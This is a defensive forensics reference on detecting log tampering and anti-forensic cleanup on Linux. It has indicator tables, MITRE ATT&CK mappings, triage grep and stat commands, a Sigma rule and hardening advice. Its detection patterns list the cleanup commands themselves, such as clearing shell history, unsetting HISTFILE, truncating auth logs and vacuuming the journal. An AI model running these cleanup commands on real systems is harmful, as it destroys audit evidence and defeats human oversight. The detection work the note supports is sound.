This note documents detection patterns related to Log Tampering and Cleanup on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | history -c | Interactive history clear | Critical | Classic immediate cleanup action. |
| Shell history | unset HISTFILE | Disable history logging | Critical | Strong anti-forensic intent. |
| Shell history | rm ~/.bash_history | Delete shell history | Critical | Direct anti-forensic action. |
| Shell history | echo > ~/.bash_history | Truncate history | Critical | Common cleanup shortcut. |
| Shell history | truncate -s 0 | File zeroing | Critical | Broader anti-forensic pattern. |
| Shell history | sed -i on logs | Selective line removal | Critical | Precise cleanup attempt. |
| Shell history | rm /var/log/... | Log deletion | Critical | High-confidence anti-forensics. |
| Shell history | journalctl --vacuum | Journal cleanup | Critical | Direct journal tampering. |
| Shell history | > /var/log/auth.log | Auth log truncation | Critical | Strong malicious cleanup. |
| File size anomaly | log suddenly tiny / empty | Cleanup artifact | Critical | Strong timeline clue. |
| File timestamp | recent log touch | Cleanup timing anchor | Critical | Correlates with intrusion. |
| Missing rotated logs | abnormal rotation gap | High | Suggests deletion. | |
auditd | write/delete logs | Process attribution | Critical | Best truth source if enabled. |
| Journald gap | missing expected entries | High | Strong anti-forensic clue. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| History missing after active shell | Selective cleanup | Critical | Strong operator signal. |
| Auth log gap during compromise | Log tampering | Critical | Important timeline clue. |
| Only specific lines removed | Targeted anti-forensics | Critical | Mature operator behavior. |
| Logs cleared after sudo or persistence | Cover-up sequence | Critical | Strong hostile chain. |
| History disabled before actions | Intentional stealth | Critical | High-value intent evidence. |
| Journald vacuum after intrusion | Journal anti-forensics | Critical | Strong cleanup signal. |
| Temp payload deleted plus logs altered | Full cleanup discipline | Critical | Mature operator pattern. |
| Shell history recreated empty | Manual reset | High | Common cleanup artifact. |
| File inode persists but size zero | Truncation | High | Useful forensic clue. |
| Logs missing but other artifacts remain | Partial cleanup | High | Common real-world outcome. |
Common Tools
| Tool | Usage |
|---|---|
history -c | Clear shell history. |
unset HISTFILE | Disable history writes. |
rm | Delete logs/history. |
truncate | Zero files. |
sed -i | Selective line deletion. |
journalctl --vacuum-* | Journal cleanup. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary anti-forensic target. |
| Auth logs | /var/log/auth.log, /var/log/secure | Critical | Common cleanup target. |
| Syslog | /var/log/syslog, /var/log/messages | Critical | Secondary target. |
| Journal | /var/log/journal/ | Critical | Journald persistence. |
| Rotated logs | /var/log/*.1, .gz | Critical | Compare for gaps. |
| Audit logs | /var/log/audit/audit.log | Critical | Often survives if enabled. |
| File metadata | stat | Critical | Timestamp truth. |
MITRE ATT&CK References
- T1070 Indicator Removal on Host
- T1070.003 Clear Command History
- T1070.002 Clear Linux or Mac System Logs
Decision Tree
-
Are logs/history altered?
- Inspect size, timestamps, missing content.
-
Which logs were targeted?
- History, auth, syslog, journal.
-
Was cleanup broad or selective?
- Full deletion vs line edits.
-
What survives elsewhere?
- Rotated logs, auditd, target logs.
-
Did cleanup follow compromise actions?
- Sequence matters strongly.
-
Pivot
- Timestamp → intrusion chain.
- Missing logs → alternate sources.
- File metadata → tamper timing.
-
Confirm anti-forensics
- Cleanup commands + altered logs + intrusion context = strong anti-forensic finding.
Example Detection Templates
Grep
grep -R "history -c\|unset HISTFILE\|rm ~/.bash_history\|truncate -s 0\|journalctl --vacuum" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "rm /var/log\|> /var/log\|sed -i" /home/*/.bash_history /root/.bash_history 2>/dev/null
ls -lh /var/log/auth.log /var/log/syslog /var/log/secure 2>/dev/null
Journalctl
journalctl --list-boots
journalctl | tail
File Inspection
stat ~/.bash_history /root/.bash_history 2>/dev/null
find /var/log -type f -printf '%TY-%Tm-%Td %TT %s %p\n' 2>/dev/null | sort
Sigma
title: Linux Log Tampering and Cleanup
id: linux-log-tampering-cleanup
status: experimental
description: Detects suspicious commands and artifacts associated with Linux anti-forensic cleanup
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- 'history -c'
- 'unset HISTFILE'
- 'truncate -s 0'
- 'journalctl --vacuum'
condition: selection_keywords
fields:
- message
- hostname
falsepositives:
- Rare legitimate cleanup activity
level: high
tags:
- attack.defense_evasion
- attack.t1070
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Central logging | Forward logs remotely | Critical | Prevents local-only cleanup success. |
| Auditd | Preserve command and file actions | Critical | Strong anti-forensic resilience. |
| Log immutability | Protect critical logs | High | Limits tampering. |
| Shell logging | Central shell command capture | High | Survives local history deletion. |
| Rotation monitoring | Detect abnormal gaps | High | Strong invariant clue. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Is history empty unexpectedly? | inspect history files | Immediate anti-forensic clue. |
| Were logs truncated? | size + timestamps | Strong tamper signal. |
| Are rotated logs missing? | inspect older logs | Gap detection. |
| Did journal shrink recently? | journal metadata | Cleanup clue. |
| Does auditd preserve truth? | inspect audit logs | Alternate truth source. |
| What action preceded cleanup? | surviving timeline | Attack reconstruction. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
history -c | Direct shell cleanup. |
unset HISTFILE | Disable future history. |
rm ~/.bash_history | Delete shell history. |
truncate -s 0 | Zero file content. |
journalctl --vacuum | Journal cleanup. |
sed -i | Selective deletion. |
> /var/log/ | Direct truncation. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Empty history after active compromise | Strong cleanup signal. |
| Auth log suddenly tiny | Likely truncation. |
| Journald gap after intrusion | Anti-forensic attempt likely. |
| Specific lines removed | Mature operator cleanup. |
| Logs cleaned but known_hosts remains | Partial cleanup common. |
| History deleted but audit survives | Auditd becomes decisive. |